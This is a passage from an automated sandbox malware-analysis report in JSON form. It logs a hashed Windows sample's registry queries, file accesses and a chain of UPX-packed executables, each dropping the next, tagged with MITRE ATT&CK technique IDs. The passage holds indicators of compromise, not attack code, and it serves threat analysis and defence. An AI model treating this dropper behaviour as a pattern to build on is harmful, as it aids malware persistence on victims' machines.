\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tfxnptb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"064260.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"628008.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nxhlxrp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jbdtnd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rbffv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"464446.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"04284.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jfdjvd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nrhhv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tbbdbn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xpldnr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hrbbfnh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"llrlrrb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vjdhtlv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ffpfpp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"thdpjd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"00688.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8644820.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2022484.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rvbjvln.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ldnfnvr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"httbh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jnnjf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"24E359DC902B844AB74D2135114A140CF3DC741BD872505837361B756F31BC9E\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"c:\\tfxnptb.exe\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"tfxnptb.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"064260.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"628008.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nxhlxrp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"jbdtnd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"rbffv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"464446.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"04284.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"jfdjvd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nrhhv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"tbbdbn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xpldnr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" writes file \"c:\\tfxnptb.exe\"\n \"tfxnptb.exe\" writes file \"c:\\064260.exe\"\n \"064260.exe\" writes file \"c:\\628008.exe\"\n \"628008.exe\" writes file \"c:\\nxhlxrp.exe\"\n \"nxhlxrp.exe\" writes file \"c:\\jbdtnd.exe\"\n \"jbdtnd.exe\" writes file \"c:\\rbffv.exe\"\n \"rbffv.exe\" writes file \"c:\\464446.exe\"\n \"464446.exe\" writes file \"c:\\04284.exe\"\n \"04284.exe\" writes file \"c:\\jfdjvd.exe\"\n \"jfdjvd.exe\" writes file \"c:\\nrhhv.exe\"\n \"nrhhv.exe\" writes file \"c:\\tbbdbn.exe\"\n \"tbbdbn.exe\" writes file \"c:\\xpldnr.exe\"\n \"xpldnr.exe\" writes file \"c:\\hrbbfnh.exe\"\n \"hrbbfnh.exe\" writes file \"c:\\llrlrrb.exe\"\n \"llrlrrb.exe\" writes file \"c:\\vjdhtlv.exe\"\n \"vjdhtlv.exe\" writes file \"c:\\ffpfpp.exe\"\n \"ffpfpp.exe\" writes file \"c:\\thdpjd.exe\"\n \"thdpjd.exe\" writes file \"c:\\00688.exe\"\n \"00688.exe\" writes file \"c:\\8644820.exe\"\n \"8644820.exe\" writes file \"c:\\2022484.exe\"\n \"2022484.exe\" writes file \"c:\\rvbjvln.exe\"\n \"rvbjvln.exe\" writes file \"c:\\ldnfnvr.exe\"\n \"ldnfnvr.exe\" writes file \"c:\\httbh.exe\"\n \"httbh.exe\" writes file \"c:\\jnnjf.exe\"\n \"jnnjf.exe\" writes file \"c:\\bnxtdj.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"vhxrtdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bdnnt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pfdblvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bphhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jvrbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"njvhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"468866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"664842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"840664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"886680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"404286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"62664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ftbltx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftbltx.exe]- [targetUID: 00000000-00004468]\n \"xrfjx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrfjx.exe]- [targetUID: 00000000-00004468]\n \"jnnxfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jnnxfl.exe]- [targetUID: 00000000-00003832]\n \"bjdlj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjdlj.exe]- [targetUID: 00000000-00003832]\n \"njhpfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njhpfx.exe]- [targetUID: 00000000-00001112]\n \"4824668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4824668.exe]- [targetUID: 00000000-00003556]\n \"66446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66446.exe]- [targetUID: 00000000-00003416]\n \"00008.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00008.exe]- [targetUID: 00000000-00003416]\n \"rhxhth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhxhth.exe]- [targetUID: 00000000-00003856]\n \"tdtflp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdtflp.exe]- [targetUID: 00000000-00003856]\n \"nxfnfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxfnfn.exe]- [targetUID: 00000000-00000644]\n \"rhnxdp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhnxdp.exe]- [targetUID: 00000000-00003636]\n \"pdhnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdhnj.exe]- [targetUID: 00000000-00003636]\n \"604424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\604424.exe]- [targetUID: 00000000-00001544]\n \"0002220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0002220.exe]- [targetUID: 00000000-00001468]\n \"8080842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8080842.exe]- [targetUID: 00000000-00001468]\n \"0888688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0888688.exe]- [targetUID: 00000000-00003200]\n \"02684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02684.exe]- [targetUID: 00000000-00004400]\n \"68606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68606.exe]- [targetUID: 00000000-00001744]\n \"8064284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8064284.exe]- [targetUID: 00000000-00001744]\n \"blpvx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blpvx.exe]- [targetUID: 00000000-00003492]\n \"hnndln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnndln.exe]- [targetUID: 00000000-00001708]\n \"hbbtpvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbbtpvh.exe]- [targetUID: 00000000-00001740]\n \"jnbhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jnbhhn.exe]- [targetUID: 00000000-00004432]\n \"lvdfpxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvdfpxj.exe]- [targetUID: 00000000-00004432]\n \"dnjtl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dnjtl.exe]- [targetUID: 00000000-00002888]\n \"lpnpn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpnpn.exe]- [targetUID: 00000000-00002888]\n \"jlvlb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jlvlb.exe]- [targetUID: 00000000-00003568]\n \"0604428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0604428.exe]- [targetUID: 00000000-00003568]\n \"482088.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482088.exe]- [targetUID: 00000000-00001184]\n \"lbdtbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbdtbf.exe]- [targetUID: 00000000-00002768]\n \"fxxdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxxdb.exe]- [targetUID: 00000000-00002768]\n \"fxlrjhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxlrjhd.exe]- [targetUID: 00000000-00002076]\n \"dnhpbvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dnhpbvd.exe]- [targetUID: 00000000-00003040]\n \"8822846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8822846.exe]- [targetUID: 00000000-00003040]\n \"08466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08466.exe]- [targetUID: 00000000-00001908]\n \"6824004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6824004.exe]- [targetUID: 00000000-00004076]\n \"nnpbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nnpbn.exe]- [targetUID: 00000000-00004076]\n \"rbppd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbppd.exe]- [targetUID: 00000000-00004324]\n \"bnxtdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnxtdj.exe]- [targetUID: 00000000-00001896]\n \"jnnjf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jnnjf.exe]- [targetUID: 00000000-00001896]\n \"httbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\httbh.exe]- [targetUID: 00000000-00001888]\n \"ldnfnvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldnfnvr.exe]- [targetUID: 00000000-00004368]\n \"rvbjvln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rvbjvln.exe]- [targetUID: 00000000-00004368]\n \"2022484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2022484.exe]- [targetUID: 00000000-00000772]\n \"8644820.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8644820.exe]- [targetUID: 00000000-00003708]\n \"00688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00688.exe]- [targetUID: 00000000-00004172]\n \"thdpjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thdpjd.exe]- [targetUID: 00000000-00006020]\n \"ffpfpp.exe\" has 